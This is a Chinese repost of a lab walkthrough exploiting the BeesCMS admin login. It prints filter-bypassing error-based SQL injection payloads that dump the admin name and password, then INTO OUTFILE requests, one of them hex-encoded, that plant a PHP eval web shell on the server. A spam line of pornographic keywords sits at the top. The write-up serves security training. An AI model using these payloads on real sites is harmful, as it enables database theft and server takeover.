国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

BeesCMS系統(tǒng)漏洞分析

這篇具有很好參考價(jià)值的文章主要介紹了BeesCMS系統(tǒng)漏洞分析。希望對大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

墨者學(xué)院
beescms漏洞,cms題,安全,web安全,數(shù)據(jù)庫
漏洞復(fù)現(xiàn)
進(jìn)入首頁,看到?jīng)]什么問題,用kail字典birb掃下路徑(發(fā)現(xiàn)管理頁面)
beescms漏洞,cms題,安全,web安全,數(shù)據(jù)庫
看到輸入框,嘗試sql注入,發(fā)現(xiàn)有注入漏洞
beescms漏洞,cms題,安全,web安全,數(shù)據(jù)庫
既然存在報(bào)錯(cuò)信息,我們就嘗試報(bào)錯(cuò)注入,經(jīng)過嘗試and也被過濾了,and用an and d代替,union用un union ion代替,select用selselectect代替:

報(bào)錯(cuò)注入

admin' an and d extractvalue(1,concat(0x7e,(select database()),0x7e))#

爆出數(shù)據(jù)庫名為dees
beescms漏洞,cms題,安全,web安全,數(shù)據(jù)庫

爆表名:
發(fā)現(xiàn)from、where、=也被過濾了,等號用like代替

admin’ an and d extractvalue(1,concat(0x7e,(selselectect table_name fro from m information_schema.tables wh where ere table_schema like ‘dees’ limit 0,1),0x7e))#

beescms漏洞,cms題,安全,web安全,數(shù)據(jù)庫

爆字段

admin' an and d extractvalue(1,concat(0x7e,(selselectect column_name fro from m information_schema.columns wh where ere table_name like 'bees_admin' limit 1,1),0x7e))#

beescms漏洞,cms題,安全,web安全,數(shù)據(jù)庫
修改為limit 2,1
beescms漏洞,cms題,安全,web安全,數(shù)據(jù)庫

爆值

admin’ an and d extractvalue(1,concat(0x7e,(selselectect admin_name fro from m bees_admin limit 0,1),0x7e))#

beescms漏洞,cms題,安全,web安全,數(shù)據(jù)庫

admin’ an and d extractvalue(1,concat(0x7e,(selselectect admin_password fro from m bees_admin limit 0,1),0x7e))#

beescms漏洞,cms題,安全,web安全,數(shù)據(jù)庫
md5解密出來admin。

進(jìn)入后發(fā)現(xiàn)沒有什么可以動的東西,想起提示網(wǎng)站位于"/var/www/html/"目錄下。

上傳木馬

那么都不用拿到賬號密碼了。。。。

user=admin' un union ion selselectect 1,2,3,4,5 i into nto outoutfilefile '/var/www/html/shell.php&password=1&code=abd5&submit=true&submit.x=60&submit.y=23

beescms漏洞,cms題,安全,web安全,數(shù)據(jù)庫
測試文件上傳可

下面直接寫入一句話木馬:

user=admin' un union ion selselectect 1,<?php @eval($_REQUEST['ABC']);?>,3,4,5 i into nto outoutfilefile '/var/www/html/1.php'&password=12&code=f333&submit=true&submit.x=49&submit.y=30

發(fā)現(xiàn)并沒有<>被過濾了
beescms漏洞,cms題,安全,web安全,數(shù)據(jù)庫
轉(zhuǎn)成16進(jìn)制

user=admin' un union ion selselectect 1,0x3c3f70687020406576616c28245f524551554553545b27414243275d293b3f3e,3,4,5 i into nto outoutfilefile
'/var/www/html/123.php'#&password=12&code=f333&submit=true&submit.x=49&submit.y=30

連接成功
beescms漏洞,cms題,安全,web安全,數(shù)據(jù)庫文章來源地址http://www.zghlxwxcb.cn/news/detail-613873.html

到了這里,關(guān)于BeesCMS系統(tǒng)漏洞分析的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 墨者——內(nèi)部文件上傳系統(tǒng)漏洞分析溯源 內(nèi)部文件上傳系統(tǒng)漏洞分析溯源

    墨者——內(nèi)部文件上傳系統(tǒng)漏洞分析溯源 內(nèi)部文件上傳系統(tǒng)漏洞分析溯源

    1.選擇合適的文件上傳 2.可以看到為 *.asp 文件 3.可以推測出此站點(diǎn)為 IIS 4.上傳 shell.asp 試試 5.上傳報(bào)錯(cuò),將其改名為 shell.asp.txt 上傳,發(fā)現(xiàn)上傳成功 6.有個(gè)問題就是服務(wù)器將我們所上傳的文件進(jìn)行了重命名,故我們應(yīng)該想辦法截?cái)?7.經(jīng)過測試發(fā)現(xiàn)不行,那么查看一下操作系統(tǒng)

    2024年02月06日
    瀏覽(23)
  • 【網(wǎng)絡(luò)安全】本地提權(quán)漏洞分析

    【網(wǎng)絡(luò)安全】本地提權(quán)漏洞分析

    CVE-2023-21752 是 2023 年開年微軟第一個(gè)有 exploit 的漏洞,原本以為有利用代碼會很好分析,但是結(jié)果花費(fèi)了很長時(shí)間,難點(diǎn)主要了兩個(gè):漏洞點(diǎn)定位和漏洞利用代碼分析,歡迎指正。 根據(jù)官方信息,該漏洞是 Windows Backup Service 中的權(quán)限提升漏洞,經(jīng)過身份認(rèn)證的攻擊者可利用此

    2024年02月01日
    瀏覽(33)
  • 【網(wǎng)絡(luò)安全】CVE漏洞分析以及復(fù)現(xiàn)

    【網(wǎng)絡(luò)安全】CVE漏洞分析以及復(fù)現(xiàn)

    漏洞詳情 Shiro 在路徑控制的時(shí)候,未能對傳入的 url 編碼進(jìn)行 decode 解碼,導(dǎo)致攻擊者可以繞過過濾器,訪問被過濾的路徑。 漏洞影響版本 Shiro 1.0.0-incubating 對應(yīng) Maven Repo 里面也有 【一一幫助安全學(xué)習(xí),所有資源獲取一一】 ①網(wǎng)絡(luò)安全學(xué)習(xí)路線 ②20份滲透測試電子書 ③安全

    2024年02月06日
    瀏覽(28)
  • 本地提權(quán)漏洞分析【網(wǎng)絡(luò)安全】

    本地提權(quán)漏洞分析【網(wǎng)絡(luò)安全】

    CVE-2023-21752 是 2023 年開年微軟第一個(gè)有 exploit 的漏洞,原本以為有利用代碼會很好分析,但是結(jié)果花費(fèi)了很長時(shí)間,難點(diǎn)主要了兩個(gè):漏洞點(diǎn)定位和漏洞利用代碼分析,歡迎指正。 根據(jù)官方信息,該漏洞是 Windows Backup Service 中的權(quán)限提升漏洞,經(jīng)過身份認(rèn)證的攻擊者可利用此

    2024年02月04日
    瀏覽(29)
  • Tcsec安全研究院|fastjson漏洞分析

    Tcsec安全研究院|fastjson漏洞分析

    fastjson 是一個(gè) Java 庫,可用于將 Java 對象轉(zhuǎn)換為其 JSON 表示形式。它還可以用于將 JSON 字符串轉(zhuǎn)換為等效的 Java 對象。Fastjson 可以處理任意的 Java 對象,包括沒有源代碼的預(yù)先存在的對象。 java 的核心就是對象的操作,fastjson 同樣遵循這個(gè)原則利用get、set操作對象。將 User 對

    2024年02月13日
    瀏覽(32)
  • Java安全之SnakeYaml漏洞分析與利用

    Java安全之SnakeYaml漏洞分析與利用

    SnakeYaml是Java中解析yaml的庫,而yaml是一種人類可讀的數(shù)據(jù)序列化語言,通常用于編寫配置文件等。 yaml基本語法 : 大小寫敏感 使用縮進(jìn)表示層級關(guān)系 縮進(jìn)只允許使用空格 # 表示注釋 支持對象、數(shù)組、純量這3種數(shù)據(jù)結(jié)構(gòu) 示例 yaml對象: yaml數(shù)組: 意思是 companies 屬性是一個(gè)數(shù)

    2024年02月04日
    瀏覽(21)
  • 網(wǎng)絡(luò)安全之反序列化漏洞分析

    網(wǎng)絡(luò)安全之反序列化漏洞分析

    FastJson 是 alibaba 的一款開源 JSON 解析庫,可用于將 Java 對象轉(zhuǎn)換為其 JSON 表示形式,也可以用于將 JSON 字符串轉(zhuǎn)換為等效的 Java 對象分別通過 toJSONString 和 parseObject/parse 來實(shí)現(xiàn)序列化和反序列化。 使用 對于序列化的方法 toJSONString() 有多個(gè)重載形式。 SerializeFeature : 通過設(shè)置

    2024年02月08日
    瀏覽(22)
  • 某C2雞肋漏洞分析:你的CS安全嗎?

    某C2雞肋漏洞分析:你的CS安全嗎?

    CobaltStrike是一個(gè)知名的紅隊(duì)命令與控制框架,采用 Beacon - TeamServer - Client 架構(gòu)。TeamServer存在受限路徑穿越寫文件與反序列化漏洞,可以被認(rèn)證后客戶端惡意利用。Client存在反序列化漏洞,可以被RogueCS攻擊。 由于這個(gè)軟件的特殊性,我們需要想想什么才是漏洞: 直接攻擊Te

    2024年01月20日
    瀏覽(19)
  • [JAVA安全]CVE-2022-33980命令執(zhí)行漏洞分析

    [JAVA安全]CVE-2022-33980命令執(zhí)行漏洞分析

    在 i春秋的漏洞靶標(biāo)上看見了此漏洞,所以前來分析一下漏洞原理,比較也是去年 7月的漏洞。 漏洞描述:Apache官方發(fā)布安全公告,修復(fù)了一個(gè)存在于Apache Commons Configuration 組件的遠(yuǎn)程代碼執(zhí)行漏洞,漏洞編號:CVE-2022-33980,漏洞威脅等級:高危。惡意攻擊者通過該漏洞,可在

    2024年02月15日
    瀏覽(22)
  • MS14-068 漏洞分析—不安全的PAC

    MS14-068 漏洞分析—不安全的PAC

    這是一個(gè)危害較高的漏洞:只需要一個(gè)域內(nèi)的普通用戶的賬戶密碼,便可拿到域控的權(quán)限 建議看本文章前,先把之前寫的 NTLM與kerberos認(rèn)證體系詳解 這篇文章看完。 利用偽造的高權(quán)限的PAC來獲取一個(gè)帶有高權(quán)限PAC的TGT。 (關(guān)于pac是什么可以看完上面的那個(gè)文章) 在我們的AS_R

    2023年04月25日
    瀏覽(41)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包